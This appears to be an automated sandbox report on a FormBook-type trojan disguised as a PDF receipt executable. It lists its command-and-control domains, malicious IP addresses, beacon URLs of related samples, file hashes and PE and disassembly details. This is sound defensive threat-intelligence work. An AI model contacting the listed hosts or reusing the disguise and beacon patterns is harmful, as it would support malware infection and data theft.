                                      http://www.yourhomecopilot.online/How_to_Be_a_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.gandi.net/en/domainRobocopy.exe, 00000006.00000002.4791340165.0000000005950000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000040E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.ecosia.org/newtab/Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ac.ecosia.org/autocomplete?q=Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/Virtual_Flight.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.yourhomecopilot.online/__media__/js/trademark.php?d=yourhomecopilot.online&type=nsRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRobocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i1.cdn-image.com/__media__/js/min.js?v2.3Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      162.0.238.246
                                      www.quantis.lifeCanada
                                      22612NAMECHEAP-NETUStrue
                                      38.47.233.65
                                      nng65.topUnited States
                                      174COGENT-174UStrue
                                      206.119.82.172
                                      d97fw.topUnited States
                                      174COGENT-174UStrue
                                      134.119.247.136
                                      www.new-wellness.netGermany
                                      34011GD-EMEA-DC-CGN1DEtrue
                                      199.59.243.227
                                      94950.bodis.comUnited States
                                      395082BODIS-NJUStrue
                                      84.32.84.32
                                      pakmartcentral.shopLithuania
                                      33922NTT-LT-ASLTtrue
                                      208.91.197.27
                                      www.yourhomecopilot.onlineVirgin Islands (BRITISH)
                                      40034CONFLUENCE-NETWORK-INCVGtrue
                                      217.70.184.50
                                      webredir.vip.gandi.netFrance
                                      29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                      52.223.13.41
                                      www.tonesandtribes.shopUnited States
                                      8987AMAZONEXPANSIONGBtrue
                                      156.226.22.233
                                      www.nad5.shopSeychelles
                                      132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                      194.58.112.174
                                      www.albero-dveri.onlineRussian Federation
                                      197695AS-REGRUtrue
                                      3.33.130.190
                                      dhkatp.vipUnited States
                                      8987AMAZONEXPANSIONGBtrue
                                      194.85.61.76
                                      www.vpnboo.onlineRussian Federation
                                      48287RU-CENTERRUtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1515414
                                      Start date and time:2024-09-22 17:34:16 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 53s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:RECIEPT.PDF.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@15/13
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 55
                                      • Number of non-executed functions: 298
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target dgGgsACWgP.exe, PID 2576 because it is empty
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      11:36:23API Interceptor9462646x Sleep call for process: Robocopy.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      162.0.238.246LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                      • www.inchey.online/ercr/
                                      38.47.233.65k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2n7s/
                                      September Order.exeGet hashmaliciousFormBookBrowse
                                      • www.nng65.top/7bwx/
                                      PO#86637.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      Quote #011698.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/yqrp/?EN-hu=3JBOC3Zinj9Q/QZ6nj2TBhVj6Qn2+UGmQB+gM3/kJK89ew2X04ZwSyucTT/Zg+CsqlXbhWc2C9lKXgVjyjN7XR24mfkQEmyM89v3vAFGTWijfWrLOg==&zx=TzUh
                                      PO#86637.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      PO#86637.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      factura-630.900.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                                      • www.qqa84.top/2qp8/
                                      199.59.243.227ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                      • www.care-for-baby-1107.xyz/cxj4/
                                      http://kateandkaylearningacademy.comGet hashmaliciousUnknownBrowse
                                      • ww1.kateandkaylearningacademy.com/_tr
                                      84.32.84.32DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
                                      • www.qriem.com/2tnc/
                                      SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                                      • www.dfmagazine.shop/wc8m/?In3=AzvpidDp&6JAhxhQ=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZgLMwl2zsPPksSh5ucr6CA17E1wkvEUc1n0CmK9rdseNyUg==
                                      2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                      • www.servehimfoundation.org/lp08/?mnShvP=hZRrlAOg9Cc11yMPXElysVdslrUOxqPvxv7mb/LWN/R8ZQj+E9ZrTE6ldQgl2DvoxGl0EVvUl/xss71F3eAnCvB+UJch5C5oTNbGviL38V1Dt27EfV1x4H4=&Cbj=nB9LWdWpMT7tUBt
                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                      • www.glintra.cyou/eaxv/
                                      PO76389.exeGet hashmaliciousFormBookBrowse
                                      • www.parcelfly.net/n59g/
                                      k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                      • www.glitterinthegrey.shop/rei7/
                                      SHIPPING DOC MBL+HBL.exeGet hashmaliciousFormBookBrowse
                                      • www.parcelfly.net/n59g/
                                      SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                      • www.servehimfoundation.org/lp08/
                                      RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                      • www.dfmagazine.shop/wc8m/?kxfp9=-6Mh&oXfTz=LNw/HBPP4tr5bvxRp17Hk/kExWr2oyZ3YB7NlE9rWxPCxu7fGi7WVymEaD0ez69xv6ZMfJiRCRJpj+4TPiEl4bd+hmDlK6IeawRubruAKHje0xl8dFknm0izH9S6
                                      Purchase order.exeGet hashmaliciousFormBookBrowse
                                      • www.godoggyonbase.online/24uv/
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      94950.bodis.comLgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      PO098765678.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      file.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 199.59.243.226
                                      rScanned_009328.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      Hesap_Hareketleri_20-07-2024.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      INV90097.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      CC-CREDIT CARD-itineraries.exeGet hashmaliciousFormBookBrowse
                                      • 199.59.243.226
                                      www.albero-dveri.onlinencOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                      • 194.58.112.174
                                      September Order.exeGet hashmaliciousFormBookBrowse
                                      • 194.58.112.174
                                      webredir.vip.gandi.netPO# Q919240.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      PO098765678.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      PO #86637.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      au1FjlRwFR.exeGet hashmaliciousFormBookBrowse
                                      • 217.70.184.50
                                      www.nad5.shopINV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                      • 156.226.22.233
                                      September Order.exeGet hashmaliciousFormBookBrowse
                                      • 156.226.22.233
                                      www.vpnboo.onlineLgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                      • 194.85.61.76
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      GD-EMEA-DC-CGN1DEhttps://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                      • 92.204.40.196
                                      https://casabeachfront.in/mainz/auth/entrar.phpGet hashmaliciousUnknownBrowse
                                      • 92.204.40.196
                                      5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                      • 80.67.18.126
                                      http://weber-portal.comGet hashmaliciousUnknownBrowse
                                      • 92.204.37.160
                                      doc20240625-00073.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 134.119.18.23
                                      doc20240626-00073.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 134.119.18.23
                                      doc20240624-00073.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      • 134.119.18.23
                                      t5SYVk0Tkt.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                      • 134.119.225.75
                                      documento_403698_06-06-2024.bat.exeGet hashmaliciousAgentTeslaBrowse
                                      • 134.119.18.23
                                      file.exeGet hashmaliciousSystemBCBrowse
                                      • 80.67.16.8
                                      NAMECHEAP-NETUSPO# Q919240.exeGet hashmaliciousFormBookBrowse
                                      • 63.250.47.40
                                      ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.236.169
                                      https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.phpGet hashmaliciousUnknownBrowse
                                      • 63.250.43.136
                                      http://siddiquimehvish07.github.io/neflixclone.github.ioGet hashmaliciousHTMLPhisherBrowse
                                      • 162.0.235.241
                                      https://tracking.dailyhealthalliance.com/index.php/lists/ow833rolea56c/unsubscribe/fd2523medreca/yc5259nwzeGet hashmaliciousUnknownBrowse
                                      • 199.188.201.195
                                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                      • 162.0.238.246
                                      https://aaa16-fa5c2b.ingress-comporellon.ewp.live/wp-content/plugins/idpass/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                      • 63.250.43.6
                                      https://urlz.fr/sfvmGet hashmaliciousUnknownBrowse
                                      • 63.250.43.5
                                      https://urlz.fr/sfvkGet hashmaliciousUnknownBrowse
                                      • 63.250.43.6
                                      http://redirectblacklitss-e3z.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                      • 162.213.255.57
                                      COGENT-174UShttps://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 154.59.122.79
                                      file.exeGet hashmaliciousFormBookBrowse
                                      • 38.47.158.160
                                      05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                                      • 23.237.9.139
                                      BJgQPShJE7.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 154.42.40.237
                                      S1WVSiZOLX.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 154.7.19.178
                                      mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 199.97.14.129
                                      XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 149.54.35.14
                                      ACUN4Da4d7.exeGet hashmaliciousUnknownBrowse
                                      • 38.9.117.83
                                      nIl2wyif6Q.elfGet hashmaliciousUnknownBrowse
                                      • 149.45.146.38
                                      bexq6dM6iT.exeGet hashmaliciousUnknownBrowse
                                      • 38.152.53.74
                                      COGENT-174UShttps://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 154.59.122.79
                                      file.exeGet hashmaliciousFormBookBrowse
                                      • 38.47.158.160
                                      05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                                      • 23.237.9.139
                                      BJgQPShJE7.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 154.42.40.237
                                      S1WVSiZOLX.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 154.7.19.178
                                      mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 199.97.14.129
                                      XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 149.54.35.14
                                      ACUN4Da4d7.exeGet hashmaliciousUnknownBrowse
                                      • 38.9.117.83
                                      nIl2wyif6Q.elfGet hashmaliciousUnknownBrowse
                                      • 149.45.146.38
                                      bexq6dM6iT.exeGet hashmaliciousUnknownBrowse
                                      • 38.152.53.74
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\Robocopy.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.1220068301579391
                                      Encrypted:false
                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
                                      MD5:87EE0BBB38B11E14090EF60A7D56C8B1
                                      SHA1:37966F94007814B687989937B4A299FA816581ED
                                      SHA-256:22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
                                      SHA-512:37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\RECIEPT.PDF.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):289280
                                      Entropy (8bit):7.994033385982784
                                      Encrypted:true
                                      SSDEEP:6144:C8BQXhXpNeikJaiyE4D9YVIJxdutR2CBQ1/p2QYs6Y:9qXRiyrTdut3BeB22
                                      MD5:1F0D2549A0C53BAEE3CC240C3B84FC80
                                      SHA1:1F70F1786EFD0AF21FD5E2CE686E28303DD1E4F7
                                      SHA-256:AC87937ED3CC7FE9F2464CC2346A64D134AEC6670CCB27E3A4B5378531A76E9C
                                      SHA-512:47D835248FC89C4760E24F459BCCEAEB7A7FF045BCCE3669EF4D2C3E3F89A5D16F2C3D86BB54FAF761A705BC0ED0FD2EA7238A70ED34302A03B54601C63C2D7B
                                      Malicious:false
                                      Reputation:low
                                      Preview:..p..PUIL..L....d.PV..rUM...5X5PUILKZVEJAG5X5PUILKZVEJAG5X.PUIBT.XE.H...4..h.#3%e:3(R*T=u*-%491j#".*@>u "k...j,(Q=.]XChKZVEJAGLY<.h)+.g6".|'R./...v+=._...8R.O..f6"...V0.02.LKZVEJAGe.5P.HMK....AG5X5PUI.KXWNKJG5.1PUILKZVEJ.S5X5@UIL;^VEJ.G5H5PUKLK\VEJAG5X3PUILKZVE:EG5Z5PUILKXV..AG%X5@UILKJVEZAG5X5PEILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVk>$?AX5P..HKZFEJA.1X5@UILKZVEJAG5X5PuIL+ZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5PUILKZVEJAG5X5P
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.53371283733198
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:RECIEPT.PDF.exe
                                      File size:1'347'819 bytes
                                      MD5:7463e695421bdd0e02e74c7ef9d6610e
                                      SHA1:f27dc8f2b10865ce26c78476fe2a1d9f74301dc9
                                      SHA256:44d7ddc5c8352f4bcce5d1acefe958aa67b49ade05f24ded7212e0b848640973
                                      SHA512:fd8330f9894adb709a8390b8f6bba2b99ec20e30af73cd9a295a9507b9799e3fdfad775708f16a27118277d581ed099367b81be7009dcb0101096c43de09198e
                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCuQh3B0RNgXI35HBlHAwYEdcHgNPG92HHNcDe:7JZoQrbTFZY1iaCRBMwc5HbgwYUcAu2T
                                      TLSH:EF55E122F5C69036C2F327B19E7EF7699A3D69360336D29723C82D315EA05416B29733
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                      Icon Hash:1733312925935517
                                      Entrypoint:0x4165c1
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                      Instruction
                                      call 00007FC3A0D6DCABh
                                      jmp 00007FC3A0D64B1Eh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push edi
                                      push esi
                                      mov esi, dword ptr [ebp+0Ch]
                                      mov ecx, dword ptr [ebp+10h]
                                      mov edi, dword ptr [ebp+08h]
                                      mov eax, ecx
                                      mov edx, ecx
                                      add eax, esi
                                      cmp edi, esi
                                      jbe 00007FC3A0D64C9Ah
                                      cmp edi, eax
                                      jc 00007FC3A0D64E36h
                                      cmp ecx, 00000080h
                                      jc 00007FC3A0D64CAEh
                                      cmp dword ptr [004A9724h], 00000000h
                                      je 00007FC3A0D64CA5h
                                      push edi
                                      push esi
                                      and edi, 0Fh
                                      and esi, 0Fh
                                      cmp edi, esi
                                      pop esi
                                      pop edi
                                      jne 00007FC3A0D64C97h
                                      jmp 00007FC3A0D65072h
                                      test edi, 00000003h
                                      jne 00007FC3A0D64CA6h
                                      shr ecx, 02h
                                      and edx, 03h
                                      cmp ecx, 08h
                                      jc 00007FC3A0D64CBBh
                                      rep movsd
                                      jmp dword ptr [00416740h+edx*4]
                                      mov eax, edi
                                      mov edx, 00000003h
                                      sub ecx, 04h
                                      jc 00007FC3A0D64C9Eh
                                      and eax, 03h
                                      add ecx, eax
                                      jmp dword ptr [00416654h+eax*4]
                                      jmp dword ptr [00416750h+ecx*4]
                                      nop
                                      jmp dword ptr [004166D4h+ecx*4]
                                      nop
                                      inc cx
                                      add byte ptr [eax-4BFFBE9Ah], dl
                                      inc cx
                                      add byte ptr [ebx], ah
                                      ror dword ptr [edx-75F877FAh], 1
                                      inc esi
                                      add dword ptr [eax+468A0147h], ecx
                                      add al, cl
                                      jmp 00007FC3A31DD497h
                                      add esi, 03h
                                      add edi, 03h
                                      cmp ecx, 08h
                                      jc 00007FC3A0D64C5Eh
                                      rep movsd
                                      jmp dword ptr [00000000h+edx*4]
                                      Programming Language:
                                      • [ C ] VS2010 SP1 build 40219
                                      • [C++] VS2010 SP1 build 40219
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ASM] VS2010 SP1 build 40219
                                      • [RES] VS2010 SP1 build 40219
                                      • [LNK] VS2010 SP1 build 40219
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
